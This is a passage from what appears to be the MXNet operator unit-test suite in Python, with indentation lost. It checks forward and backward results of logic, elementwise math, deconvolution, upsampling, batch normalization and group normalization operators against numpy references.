logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out.asnumpy(), reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out.asnumpy(), reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0].asnumpy(), np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"].asnumpy(), np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0].asnumpy(), data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1.asnumpy(), npout_grad1)
assert_almost_equal(arr_grad2.asnumpy(), npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1.asnumpy(), npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0].asnumpy(), rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy(), deconv_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, num_groups, 1, 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out.reshape(dshape), mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, num_groups, 1, 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
gamma_grad = np.sum(x_hat * ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
x_hat_grad = ograd * gamma
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_groups,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
